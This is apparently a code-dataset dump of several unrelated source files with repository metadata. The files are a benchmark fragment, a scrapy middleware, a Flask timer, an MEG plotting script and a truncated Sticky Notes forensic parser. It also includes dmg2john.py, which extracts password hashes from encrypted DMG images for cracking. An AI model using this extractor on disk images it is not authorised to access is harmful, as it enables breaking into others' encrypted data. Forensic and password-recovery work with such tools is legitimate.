for func_name, batch_size, device in product(func_names, batch_sizes, devices):
# Run CUDA-only implementations only on GPU
if "cuda" in func_name and not device.startswith("cuda"):
continue
# Torch built-ins are quite slow on larger batches
if "torch" in func_name and batch_size > 8192:
continue
# Avoid running CPU implementations on larger batches as well
if device == "cpu" and batch_size > 8192:
continue
kwargs_list.append(
{"func_name": func_name, "batch_size": batch_size, "device": device}
)
benchmark(
test_symeig3x3,
"SYMEIG3X3",
kwargs_list,
warmup_iters=3,
)
if __name__ == "__main__":
bm_symeig3x3() | en | 0.916975 | # Copyright (c) Meta Platforms, Inc. and affiliates. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. # Run CUDA-only implementations only on GPU # Torch built-ins are quite slow on larger batches # Avoid running CPU implementations on larger batches as well | 1.758614 | 2 |
Z - Tool Box/x2john/dmg2john.py | dfirpaul/Active-Directory-Exploitation-Cheat-Sheet-1 | 2,109 | 6632480 | <filename>Z - Tool Box/x2john/dmg2john.py
#!/usr/bin/env python
# Written by <NAME> <dhiru at openwall.com> in March, 2013
# My code is under "Simplified BSD License"
import sys
import os
import struct
from binascii import hexlify
# header structs are taken from vilefault and hashkill projects
v1_header_fmt = '> 48s I I 48s 32s I 296s I 300s I 48s 484s'
v1_header_size = struct.calcsize(v1_header_fmt)
# v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 48s'
# encrypted_blob_size can be 64, handle such cases properly too, a value of 48
# is already handled well
v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 64s'
v2_header_size = struct.calcsize(v2_header_fmt)
PY3 = sys.version_info[0] == 3
PMV = sys.version_info[1] >= 6
if PY3 or PMV:
exec('MAGICv1=b"cdsaencr"')
exec('MAGICv2=b"encrcdsa"')
else:
MAGICv1 = "cdsaencr"
MAGICv2 = "encrcdsa"
def process_file(filename):
cno = 0
data_size = 0
headerver = 0
try:
fd = open(filename, "rb")
except IOError:
e = sys.exc_info()[1]
sys.stderr.write("%s\n" % str(e))
return
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv2:
headerver = 2
else:
fd.seek(-8, 2)
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv1:
headerver = 1
if headerver == 0:
sys.stderr.write("%s is not an encrypted DMG file!\n" % filename)
return
sys.stderr.write("Header version %d detected\n" % headerver)
if headerver == 1:
fd.seek(- v1_header_size, 2)
data = fd.read(v1_header_size)
if len(data) != v1_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v1_header_fmt, data)
(_, kdf_iteration_count, kdf_salt_len, kdf_salt, _,
len_wrapped_aes_key, wrapped_aes_key, len_hmac_sha1_key,
wrapped_hmac_sha1_key, _, _, _) = data
sys.stdout.write("%s:$dmg$%d*%d*%s*%d*%s*%d*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver, kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len * 2].decode("ascii"),
len_wrapped_aes_key,
hexlify(wrapped_aes_key)[0:len_wrapped_aes_key * 2].decode("ascii"),
len_hmac_sha1_key,
hexlify(wrapped_hmac_sha1_key)[0:len_hmac_sha1_key * 2].decode("ascii"),
kdf_iteration_count, filename))
else:
fd.seek(0, 0)
data = fd.read(v2_header_size)
if len(data) != v2_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v2_header_fmt, data)
(sig, version, enc_iv_size, _, _, _, _,
unk5, uuid, blocksize, datasize, dataoffset, filler1,
kdf_algorithm, kdf_prng_algorithm, kdf_iteration_count,
kdf_salt_len, kdf_salt, blob_enc_iv_size, blob_enc_iv,
blob_enc_key_bits, blob_enc_algorithm, blob_enc_padding,
blob_enc_mode, encrypted_keyblob_size, encrypted_keyblob) = data
fd.seek(dataoffset, 0)
cno = ((datasize + 4095) // 4096) - 2
data_size = datasize - cno * 4096
data_size = int(data_size)
if data_size < 0:
sys.stderr.write("%s is not a valid DMG file! \n" % filename)
return
if kdf_salt_len > 32:
sys.stderr.write("%s is not a valid DMG file. salt length " \
"is too long!\n" % filename)
return
# read starting chunk(s)
fd.seek(dataoffset + int(cno * 4096), 0)
chunk1 = fd.read(data_size)
if len(chunk1) != data_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# read last chunk
fd.seek(dataoffset, 0)
chunk2 = fd.read(4096)
if len(chunk2) != 4096:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# output hash
sys.stdout.write("%s:$dmg$%d*%d*%s*32*%s*%d*%s*%d*%d*%s*1*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver,
kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len*2].decode("ascii"),
hexlify(blob_enc_iv)[0:64].decode("ascii"),
encrypted_keyblob_size,
hexlify(encrypted_keyblob)[0:encrypted_keyblob_size*2].decode("ascii") + \
"0" * (encrypted_keyblob_size * 2 - \
len(encrypted_keyblob) * 2),
cno, data_size, hexlify(chunk1).decode("ascii"),
hexlify(chunk2).decode("ascii"),
kdf_iteration_count, filename))
if __name__ == "__main__":
sys.stderr.write("Using 'dmg2john' instead of this program (%s) is recommended!\n\n" % sys.argv[0])
if len(sys.argv) < 2:
sys.stderr.write("Usage: %s [DMG files]\n" % sys.argv[0])
sys.exit(-1)
for i in range(1, len(sys.argv)):
process_file(sys.argv[i])
| <filename>Z - Tool Box/x2john/dmg2john.py
#!/usr/bin/env python
# Written by <NAME> <dhiru at openwall.com> in March, 2013
# My code is under "Simplified BSD License"
import sys
import os
import struct
from binascii import hexlify
# header structs are taken from vilefault and hashkill projects
v1_header_fmt = '> 48s I I 48s 32s I 296s I 300s I 48s 484s'
v1_header_size = struct.calcsize(v1_header_fmt)
# v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 48s'
# encrypted_blob_size can be 64, handle such cases properly too, a value of 48
# is already handled well
v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 64s'
v2_header_size = struct.calcsize(v2_header_fmt)
PY3 = sys.version_info[0] == 3
PMV = sys.version_info[1] >= 6
if PY3 or PMV:
exec('MAGICv1=b"cdsaencr"')
exec('MAGICv2=b"encrcdsa"')
else:
MAGICv1 = "cdsaencr"
MAGICv2 = "encrcdsa"
def process_file(filename):
cno = 0
data_size = 0
headerver = 0
try:
fd = open(filename, "rb")
except IOError:
e = sys.exc_info()[1]
sys.stderr.write("%s\n" % str(e))
return
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv2:
headerver = 2
else:
fd.seek(-8, 2)
buf8 = fd.read(8)
if len(buf8) != 8:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
if buf8 == MAGICv1:
headerver = 1
if headerver == 0:
sys.stderr.write("%s is not an encrypted DMG file!\n" % filename)
return
sys.stderr.write("Header version %d detected\n" % headerver)
if headerver == 1:
fd.seek(- v1_header_size, 2)
data = fd.read(v1_header_size)
if len(data) != v1_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v1_header_fmt, data)
(_, kdf_iteration_count, kdf_salt_len, kdf_salt, _,
len_wrapped_aes_key, wrapped_aes_key, len_hmac_sha1_key,
wrapped_hmac_sha1_key, _, _, _) = data
sys.stdout.write("%s:$dmg$%d*%d*%s*%d*%s*%d*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver, kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len * 2].decode("ascii"),
len_wrapped_aes_key,
hexlify(wrapped_aes_key)[0:len_wrapped_aes_key * 2].decode("ascii"),
len_hmac_sha1_key,
hexlify(wrapped_hmac_sha1_key)[0:len_hmac_sha1_key * 2].decode("ascii"),
kdf_iteration_count, filename))
else:
fd.seek(0, 0)
data = fd.read(v2_header_size)
if len(data) != v2_header_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
data = struct.unpack(v2_header_fmt, data)
(sig, version, enc_iv_size, _, _, _, _,
unk5, uuid, blocksize, datasize, dataoffset, filler1,
kdf_algorithm, kdf_prng_algorithm, kdf_iteration_count,
kdf_salt_len, kdf_salt, blob_enc_iv_size, blob_enc_iv,
blob_enc_key_bits, blob_enc_algorithm, blob_enc_padding,
blob_enc_mode, encrypted_keyblob_size, encrypted_keyblob) = data
fd.seek(dataoffset, 0)
cno = ((datasize + 4095) // 4096) - 2
data_size = datasize - cno * 4096
data_size = int(data_size)
if data_size < 0:
sys.stderr.write("%s is not a valid DMG file! \n" % filename)
return
if kdf_salt_len > 32:
sys.stderr.write("%s is not a valid DMG file. salt length " \
"is too long!\n" % filename)
return
# read starting chunk(s)
fd.seek(dataoffset + int(cno * 4096), 0)
chunk1 = fd.read(data_size)
if len(chunk1) != data_size:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# read last chunk
fd.seek(dataoffset, 0)
chunk2 = fd.read(4096)
if len(chunk2) != 4096:
sys.stderr.write("%s is not a DMG file!\n" % filename)
return
# output hash
sys.stdout.write("%s:$dmg$%d*%d*%s*32*%s*%d*%s*%d*%d*%s*1*%s*%d::::%s\n" % \
(os.path.basename(filename), headerver,
kdf_salt_len,
hexlify(kdf_salt)[0:kdf_salt_len*2].decode("ascii"),
hexlify(blob_enc_iv)[0:64].decode("ascii"),
encrypted_keyblob_size,
hexlify(encrypted_keyblob)[0:encrypted_keyblob_size*2].decode("ascii") + \
"0" * (encrypted_keyblob_size * 2 - \
len(encrypted_keyblob) * 2),
cno, data_size, hexlify(chunk1).decode("ascii"),
hexlify(chunk2).decode("ascii"),
kdf_iteration_count, filename))
if __name__ == "__main__":
sys.stderr.write("Using 'dmg2john' instead of this program (%s) is recommended!\n\n" % sys.argv[0])
if len(sys.argv) < 2:
sys.stderr.write("Usage: %s [DMG files]\n" % sys.argv[0])
sys.exit(-1)
for i in range(1, len(sys.argv)):
process_file(sys.argv[i])
| en | 0.863184 | #!/usr/bin/env python # Written by <NAME> <dhiru at openwall.com> in March, 2013 # My code is under "Simplified BSD License" # header structs are taken from vilefault and hashkill projects # v2_header_fmt = '> 8s I I I I I I I 16s I Q Q 24s I I I I 32s I 32s I I I I I 48s' # encrypted_blob_size can be 64, handle such cases properly too, a value of 48 # is already handled well # read starting chunk(s) # read last chunk # output hash | 2.138239 | 2 |
scrapy_middlewares/req_middleware.py | CLannadZSY/scrapy-middlewares | 0 | 6632481 | import logging
logger = logging.getLogger('ModuleReqMiddleware.request')
class ReqMiddleware:
def __init__(self, settings, *args, **kwargs):
super(ReqMiddleware, self).__init__(*args, **kwargs)
self._settings = settings
self.logger = logger
@staticmethod
def transform_headers(headers):
new_headers = {
x.decode(): ','.join(map(lambda y: y.decode(), y))
for x, y in headers.items()
}
return new_headers
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
return cls(settings)
| import logging
logger = logging.getLogger('ModuleReqMiddleware.request')
class ReqMiddleware:
def __init__(self, settings, *args, **kwargs):
super(ReqMiddleware, self).__init__(*args, **kwargs)
self._settings = settings
self.logger = logger
@staticmethod
def transform_headers(headers):
new_headers = {
x.decode(): ','.join(map(lambda y: y.decode(), y))
for x, y in headers.items()
}
return new_headers
@classmethod
def from_crawler(cls, crawler):
settings = crawler.settings
return cls(settings)
| none | 1 | 2.417673 | 2 |
|
app.py | daleattier/timer | 0 | 6632482 | <reponame>daleattier/timer<filename>app.py
# -*- coding: utf-8 -*-
"""
author: <NAME>
blog: withlihui.com
email: <EMAIL>
github: github.com/greyli
column: zhuanlan.zhihu.com/flask
---------------------------------
A simple timer made with Flask and JavaScript.
https://github.com/helloflask/timer
---------------------------------
MIT license.
"""
import re
from flask import Flask, render_template, url_for, redirect, request, flash
app = Flask(__name__)
app.config['SECRET_KEY'] = 'a very secret string'
@app.route('/')
def index():
return redirect(url_for('timer', num=21*60))
@app.route('/<int:num>s')
@app.route('/<int:num>')
def timer(num):
return render_template('index.html', num=num)
@app.route('/custom', methods=['GET', 'POST'])
def custom():
time = request.form.get('time', 180)
# use re to validate input data
m = re.match('\d+[smh]?$', time)
if m is None:
flash(u'PLease use the following format 34、20s、15m、2h')
return redirect(url_for('index'))
if time[-1] not in 'smh':
return redirect(url_for('timer', num=int(time)))
else:
type = {'s': 'timer', 'm': 'minutes', 'h': 'hours'}
return redirect(url_for(type[time[-1]], num=int(time[:-1])))
@app.route('/<int:num>m')
def minutes(num):
return redirect(url_for('timer', num=num*60))
@app.route('/<int:num>h')
def hours(num):
return redirect(url_for('timer', num=num*3600))
# todo pomodoro mode: loop a 25-5 minutes cycle
@app.route('/pomodoro')
def pomodoro():
return render_template('index.html')
@app.errorhandler(404)
def page_not_fouond(e):
flash(u'Sorry Can not find this file: )')
return redirect(url_for('timer', num=244))
| # -*- coding: utf-8 -*-
"""
author: <NAME>
blog: withlihui.com
email: <EMAIL>
github: github.com/greyli
column: zhuanlan.zhihu.com/flask
---------------------------------
A simple timer made with Flask and JavaScript.
https://github.com/helloflask/timer
---------------------------------
MIT license.
"""
import re
from flask import Flask, render_template, url_for, redirect, request, flash
app = Flask(__name__)
app.config['SECRET_KEY'] = 'a very secret string'
@app.route('/')
def index():
return redirect(url_for('timer', num=21*60))
@app.route('/<int:num>s')
@app.route('/<int:num>')
def timer(num):
return render_template('index.html', num=num)
@app.route('/custom', methods=['GET', 'POST'])
def custom():
time = request.form.get('time', 180)
# use re to validate input data
m = re.match('\d+[smh]?$', time)
if m is None:
flash(u'PLease use the following format 34、20s、15m、2h')
return redirect(url_for('index'))
if time[-1] not in 'smh':
return redirect(url_for('timer', num=int(time)))
else:
type = {'s': 'timer', 'm': 'minutes', 'h': 'hours'}
return redirect(url_for(type[time[-1]], num=int(time[:-1])))
@app.route('/<int:num>m')
def minutes(num):
return redirect(url_for('timer', num=num*60))
@app.route('/<int:num>h')
def hours(num):
return redirect(url_for('timer', num=num*3600))
# todo pomodoro mode: loop a 25-5 minutes cycle
@app.route('/pomodoro')
def pomodoro():
return render_template('index.html')
@app.errorhandler(404)
def page_not_fouond(e):
flash(u'Sorry Can not find this file: )')
return redirect(url_for('timer', num=244)) | en | 0.485094 | # -*- coding: utf-8 -*- author: <NAME> blog: withlihui.com email: <EMAIL> github: github.com/greyli column: zhuanlan.zhihu.com/flask --------------------------------- A simple timer made with Flask and JavaScript. https://github.com/helloflask/timer --------------------------------- MIT license. # use re to validate input data # todo pomodoro mode: loop a 25-5 minutes cycle | 3.15666 | 3 |
scripts/plot_stats_sensors.py | kingjr/decod_unseen_maintenance | 10 | 6632483 | # Author: <NAME> <<EMAIL>>
#
# Licence: BSD 3-clause
"""Plot the topographical effects obtained in each analysis.
Used to generate Figure 3.
"""
import numpy as np
import matplotlib.pyplot as plt
from jr.plot import plot_butterfly, plot_gfp, pretty_colorbar
from config import report, load
from conditions import analyses, tois
# Apply contrast on each type of epoch
for analysis in analyses:
# load stats
evoked, _, p_values, sig, _ = load(
'evoked', analysis=('stats_' + analysis['name']))
evoked.data -= analysis['chance'] # to avoid interpolation bug
evoked_full = evoked.copy() # used for tois
# Find significant cluster
sig = np.zeros_like(evoked.data)
sig[::3, :] = sig[1::3, :] = sig[2::3, :] = p_values < .05
sig_times = np.array(np.sum(sig, axis=0) > 0., dtype=int)
sig = sig[:, np.where((evoked.times >= -.100) & (evoked.times <= .600))[0]]
# Define color limit
toi = np.where((evoked_full.times >= tois[0][0]) &
(evoked_full.times <= tois[0][1]))[0]
vmin = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
max_toi = 3
if 'target' in analysis['name']:
max_toi = 1
toi = np.where((evoked_full.times >= tois[max_toi][0]) &
(evoked_full.times <= tois[max_toi][1]))[0]
vmax = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
vmin_mag = analysis['chance'] - vmax
if vmax - vmin < .005:
vmax += .005
# clim text
smin = '%.2f' % (vmin + analysis['chance'])
smin_mag = '%.2f' % (vmin_mag + analysis['chance'])
smax = '%.2f' % (vmax + analysis['chance'])
if vmax < 5e-3:
smin = '0' if vmin == 0 else '%.0e' % vmin
smax = '%.0e' % vmax
# Plot topo snapshots
evoked.crop(-.100, .600)
opts = dict(sensors=False, scale=1, contours=False, show=False,
times=np.linspace(0, .500, 6), average=.025, colorbar=True)
fig_grad = evoked.plot_topomap(cmap=analysis['cmap'], ch_type='grad',
vmin=vmin, vmax=vmax, **opts)
cax = fig_grad.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin, smax])
cax.set_title('')
report.add_figs_to_section(fig_grad, 'topo_grad', analysis['name'])
fig_mag = evoked.plot_topomap(ch_type='mag', vmin=vmin_mag, vmax=vmax,
**opts)
cax = fig_mag.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin_mag, '', smax])
cax.set_title('')
# fig_mag.tight_layout()
report.add_figs_to_section(fig_mag, 'topo_mag', analysis['name'])
# Plot butterfly
fig_butt_m, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_butterfly(evoked, ax=ax, sig=sig, color=analysis['color'],
ch_type='mag')
# ax.axvline(800, color='k')
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_m, 'butterfly_mag', analysis['name'])
# plot GFP
fig_butt_gfp, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_gfp(evoked, ax=ax, sig=sig, color=analysis['color'])
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_gfp, 'butterfly_gfp', analysis['name'])
# Plot topo of mean |effect| on TOI
evoked_full.data = np.abs(evoked_full.data)
fig, axes = plt.subplots(1, len(tois), figsize=[9, 2.5])
fig.subplots_adjust(wspace=0.01, left=0.)
for ax, toi in zip(axes, tois):
evoked_full.plot_topomap(times=[np.mean(toi)], average=np.ptp(toi),
cmap=analysis['cmap'], ch_type='grad',
show=False,
vmin=vmin, vmax=vmax, contours=False, scale=1,
colorbar=False, sensors=False, axes=ax)
from matplotlib.image import AxesImage
objects = axes[-2].get_children()
im = objects[np.where([isinstance(ii, AxesImage) for ii in objects])[0][0]]
pretty_colorbar(cax=fig.add_axes([.91, 0.15, .03, .6]),
im=im, ticklabels=[smin, '', smax])
report.add_figs_to_section(fig, 'topo_mean', analysis['name'])
report.save()
| # Author: <NAME> <<EMAIL>>
#
# Licence: BSD 3-clause
"""Plot the topographical effects obtained in each analysis.
Used to generate Figure 3.
"""
import numpy as np
import matplotlib.pyplot as plt
from jr.plot import plot_butterfly, plot_gfp, pretty_colorbar
from config import report, load
from conditions import analyses, tois
# Apply contrast on each type of epoch
for analysis in analyses:
# load stats
evoked, _, p_values, sig, _ = load(
'evoked', analysis=('stats_' + analysis['name']))
evoked.data -= analysis['chance'] # to avoid interpolation bug
evoked_full = evoked.copy() # used for tois
# Find significant cluster
sig = np.zeros_like(evoked.data)
sig[::3, :] = sig[1::3, :] = sig[2::3, :] = p_values < .05
sig_times = np.array(np.sum(sig, axis=0) > 0., dtype=int)
sig = sig[:, np.where((evoked.times >= -.100) & (evoked.times <= .600))[0]]
# Define color limit
toi = np.where((evoked_full.times >= tois[0][0]) &
(evoked_full.times <= tois[0][1]))[0]
vmin = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
max_toi = 3
if 'target' in analysis['name']:
max_toi = 1
toi = np.where((evoked_full.times >= tois[max_toi][0]) &
(evoked_full.times <= tois[max_toi][1]))[0]
vmax = np.percentile(np.mean(evoked_full.data[:, toi], axis=1), 99)
vmin_mag = analysis['chance'] - vmax
if vmax - vmin < .005:
vmax += .005
# clim text
smin = '%.2f' % (vmin + analysis['chance'])
smin_mag = '%.2f' % (vmin_mag + analysis['chance'])
smax = '%.2f' % (vmax + analysis['chance'])
if vmax < 5e-3:
smin = '0' if vmin == 0 else '%.0e' % vmin
smax = '%.0e' % vmax
# Plot topo snapshots
evoked.crop(-.100, .600)
opts = dict(sensors=False, scale=1, contours=False, show=False,
times=np.linspace(0, .500, 6), average=.025, colorbar=True)
fig_grad = evoked.plot_topomap(cmap=analysis['cmap'], ch_type='grad',
vmin=vmin, vmax=vmax, **opts)
cax = fig_grad.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin, smax])
cax.set_title('')
report.add_figs_to_section(fig_grad, 'topo_grad', analysis['name'])
fig_mag = evoked.plot_topomap(ch_type='mag', vmin=vmin_mag, vmax=vmax,
**opts)
cax = fig_mag.get_children()[-1]
cax.set_yticks([vmin, vmax])
cax.set_yticklabels([smin_mag, '', smax])
cax.set_title('')
# fig_mag.tight_layout()
report.add_figs_to_section(fig_mag, 'topo_mag', analysis['name'])
# Plot butterfly
fig_butt_m, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_butterfly(evoked, ax=ax, sig=sig, color=analysis['color'],
ch_type='mag')
# ax.axvline(800, color='k')
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_m, 'butterfly_mag', analysis['name'])
# plot GFP
fig_butt_gfp, ax = plt.subplots(1, figsize=fig_grad.get_size_inches())
plot_gfp(evoked, ax=ax, sig=sig, color=analysis['color'])
ax.set_xlim([-100, 600])
ax.set_xlabel('Times (ms)', labelpad=-15)
report.add_figs_to_section(fig_butt_gfp, 'butterfly_gfp', analysis['name'])
# Plot topo of mean |effect| on TOI
evoked_full.data = np.abs(evoked_full.data)
fig, axes = plt.subplots(1, len(tois), figsize=[9, 2.5])
fig.subplots_adjust(wspace=0.01, left=0.)
for ax, toi in zip(axes, tois):
evoked_full.plot_topomap(times=[np.mean(toi)], average=np.ptp(toi),
cmap=analysis['cmap'], ch_type='grad',
show=False,
vmin=vmin, vmax=vmax, contours=False, scale=1,
colorbar=False, sensors=False, axes=ax)
from matplotlib.image import AxesImage
objects = axes[-2].get_children()
im = objects[np.where([isinstance(ii, AxesImage) for ii in objects])[0][0]]
pretty_colorbar(cax=fig.add_axes([.91, 0.15, .03, .6]),
im=im, ticklabels=[smin, '', smax])
report.add_figs_to_section(fig, 'topo_mean', analysis['name'])
report.save()
| en | 0.631646 | # Author: <NAME> <<EMAIL>> # # Licence: BSD 3-clause Plot the topographical effects obtained in each analysis. Used to generate Figure 3. # Apply contrast on each type of epoch # load stats # to avoid interpolation bug # used for tois # Find significant cluster # Define color limit # clim text # Plot topo snapshots # fig_mag.tight_layout() # Plot butterfly # ax.axvline(800, color='k') # plot GFP # Plot topo of mean |effect| on TOI | 2.370272 | 2 |
modules/sticky_note/lv1_stickynote.py | naaya17/carpe | 56 | 6632484 | <reponame>naaya17/carpe
# -*- coding:utf-8 -*-
import sqlite3
import datetime
import os
import pandas as pd
import olefile
import re
"""
testcase
1.[win7]_가상환경_StickyNotes.snt
"""
class Sticky_Note_Information:
par_id = ''
case_id = ''
evd_id = ''
note_id = ''
type = ''
content = ''
activated = ''
createdtime = ''
modifiedtime = ''
created_at_list = ["CreatedAt"]
updated_at_list = ["UpdatedAt"]
media_file_path_list = ["LocalFileRelativePath"]
media_mime_type_list = ["MimeType"]
media_id_list = ["Id"]
media_parent_id_list = ["ParentId"]
note_text_list = ["Text"]
note_is_open_list = ["IsOpen"]
note_id_list = ["Id"]
media_column_name_list = ["LocalFileRelativePath", "MimeType", "Id", "ParentId", "CreatedAt", "UpdatedAt"]
note_column_name_list = ["Text", "IsOpen", "Id", "CreatedAt", "UpdatedAt"]
our_db_column_name = ["Note_Id", "Type", "Content", "Activated", "CreatedTime", "ModifiedTime"]
def Parse2Type(data):
return data
def Parse2FilePath(data):
removable_text = "ms-appdata:///local/media/"
if removable_text in data:
result = data.replace(removable_text, "")
return result
def Parse2TimeStamp(data):
if data == 0:
return 0
return datetime.datetime.fromtimestamp(data / 10000000 - 62135596800).strftime('%Y-%m-%dT%H:%M:%S.%f')+'Z'
def Parse2Active(data):
if data == 1:
return "Open"
else:
return "Close"
def Parse2Id(data):
return data
def Parse2Text(data):
# id의 정규표현식 : \id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}
p = re.compile("\\\\id=[a-zA-Z0-9_]{8}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{4}-[a-zA-Z0-9_]{12}")
data = re.sub(p, "", data)
return data
def saveDataInDict(our_db, output_column_name, data):
our_db[output_column_name] = data
def ParseColumn(temp_result_dictionary, data, column_name, sep):
if sep == "Media":
saveDataInDict(temp_result_dictionary, "Activated", "NULL")
if column_name in media_file_path_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2FilePath(data))
elif column_name in media_mime_type_list:
saveDataInDict(temp_result_dictionary, "Type", Parse2Type(data))
# elif column_name in media_id_list:
# temp_result_dictionary["Media_Id"] = Parse2Id(data)
elif column_name in media_parent_id_list:
# 결과 값에서 Text와 image를 엮기 위해서 ParentId를 Id로 바꿔줌
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
elif sep == "Note":
saveDataInDict(temp_result_dictionary, "Type", "Text")
if column_name in note_text_list:
saveDataInDict(temp_result_dictionary, "Content", Parse2Text(data))
elif column_name in note_is_open_list:
saveDataInDict(temp_result_dictionary, "Activated", Parse2Active(data))
elif column_name in note_id_list:
saveDataInDict(temp_result_dictionary, "Note_Id", Parse2Id(data))
elif column_name in created_at_list:
saveDataInDict(temp_result_dictionary, "CreatedTime", Parse2TimeStamp(data))
elif column_name in updated_at_list:
saveDataInDict(temp_result_dictionary, "ModifiedTime", Parse2TimeStamp(data))
def convertSntResult(id, dictionary):
our_db = dict()
saveDataInDict(our_db, "Type", "text")
saveDataInDict(our_db, "Activated", "NULL")
saveDataInDict(our_db, "Note_Id", id)
saveDataInDict(our_db, "CreatedTime", dictionary["created_time"])
saveDataInDict(our_db, "ModifiedTime", dictionary["modified_time"])
saveDataInDict(our_db, "Content", dictionary["content"])
result = convertDictionaryToList(our_db)
return result
def convertDictionaryToList(dict):
result = list()
for output_column_name in our_db_column_name:
result.append(dict[output_column_name])
return result
def divide2column(row, column_name_list, sep):
result_sql = dict()
for i in range(0, len(column_name_list)):
ParseColumn(result_sql, row[i], column_name_list[i], sep)
result = convertDictionaryToList(result_sql)
return result
def ParseSnt(file):
ole = olefile.OleFileIO(file)
result = dict()
for stream in ole.listdir():
if stream[0].count("-") == 3 and stream[1] == "3":
created_time = ole.getctime(stream[0])
modified_time = ole.getmtime(stream[0])
content = ole.openstream((stream)).read().decode("utf-16").rstrip("\u0000")
result[stream[0]] = dict()
result_stream = result[stream[0]]
result_stream["created_time"] = str(created_time)
result_stream["modified_time"] = str(modified_time)
result_stream["content"] = content
return result
def SaveDataInDict(our_db, output_colume_name, data):
our_db[output_colume_name] = data
def STICKYNOTE(filename):
result = []
note_count = 0
'''
basepath = os.getcwd()
#filename = "[win10]_1809_가상환경_plum.sqlite"
target_file = basepath + "//" + filename
'''
target_file = filename
# olefile signature = 0x D0 CF 11 E0 A1 B1 1A E1
# sqlite signature = 0x 53 51 4C 69 74 65 20 66 6F 72 6D 61 74 20 33 00
if not olefile.isOleFile(target_file):
conn = sqlite3.connect(target_file)
cur = conn.cursor()
sql_command = "SELECT "
for column_name in note_column_name_list:
sql_command += column_name
if column_name is not note_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Note"
note_data = cur.execute(sql_command)
for row in note_data:
note_data_row = divide2column(row, note_column_name_list, "Note")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = note_data_row[0]
result[note_count].type = note_data_row[1]
result[note_count].content = note_data_row[2]
result[note_count].activated = note_data_row[3]
result[note_count].createdtime = note_data_row[4]
result[note_count].modifiedtime = note_data_row[5]
note_count = note_count + 1
sql_command = "SELECT "
for column_name in media_column_name_list:
sql_command += column_name
if column_name is not media_column_name_list[-1]:
sql_command += ', '
sql_command += " FROM Media"
media_data = cur.execute(sql_command)
for row in media_data:
media_data_row = divide2column(row, media_column_name_list, "Media")
sticky_note_information = Sticky_Note_Information()
result.append(sticky_note_information)
result[note_count].note_id = media_data_row[0]
result[note_count].type = media_data_row[1]
result[note_count].content = ''.join(media_data_row[2].split())
result[note_count].activated = media_data_row[3]
result[note_count].createdtime = media_data_row[4]
result[note_count].modifiedtime = media_data_row[5]
note_count = note_count + 1
elif olefile.isOleFile(target_file):
result_snt = ParseSnt(target_file)
for key, value in result_snt.items():
rs = convertSntResult(key, value)
result.append(rs)
return result
| # -*- coding:utf-8 -*-
import sqlite3
import datetime
import os
import pandas as pd
import olefile
import re
"""
testcase
1.[win7]_가상환경_StickyNotes.snt
"""
class Sticky_Note_Information:
par_id = ''
case_id = ''
evd_id = ''
note_id = ''
type = ''
content = ''
activated = ''
createdtime = ''
modifiedtime = ''
created_at_list = ["CreatedAt"]
updated_at_list = ["UpdatedAt"]
media_file_path_list = ["LocalFileRelativePath"]
media_mime_type_list = ["MimeType"]
media_id_list = ["Id"]
media_parent_id_list = ["ParentId"]
note_text_list = ["Text"]
note_is_open_list = ["IsOpen"]
note_id_list = ["Id"]
media_column_name_list = ["LocalFileRelativePath", "MimeType", "Id", "ParentId", "CreatedAt", "UpdatedAt"]
